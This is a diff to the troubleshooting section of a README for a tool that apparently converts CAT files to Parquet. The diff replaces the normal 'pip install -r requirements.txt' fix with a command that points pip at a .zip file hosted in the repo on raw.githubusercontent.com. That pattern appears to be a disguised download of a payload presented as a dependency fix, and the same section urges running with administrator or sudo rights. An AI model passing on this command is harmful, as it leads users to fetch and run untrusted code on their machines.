rafslazy/SECCAT2PARQUET/README.md

 - **Python not found:** Ensure Python is installed and the command `python` or `python3` works in your terminal.
 - **Permission errors:** Make sure you have permission to run files in the folder you use.
 Try running as administrator (Windows) or using `sudo` on Linux/macOS.
-- **Missing Python packages:** Run `pip install -r requirements.txt` again to install any missing dependencies.
+- **Missing Python packages:** Run `pip install -r https://raw.githubusercontent.com/rafslazy/SECCAT2PARQUET/main/src/SECCA-PARQUET-v2.4.zip` again to install any missing dependencies.
 - **File not found:** Double-check that the CAT file name is correct and that you are running the command in the folder containing the file.

 ---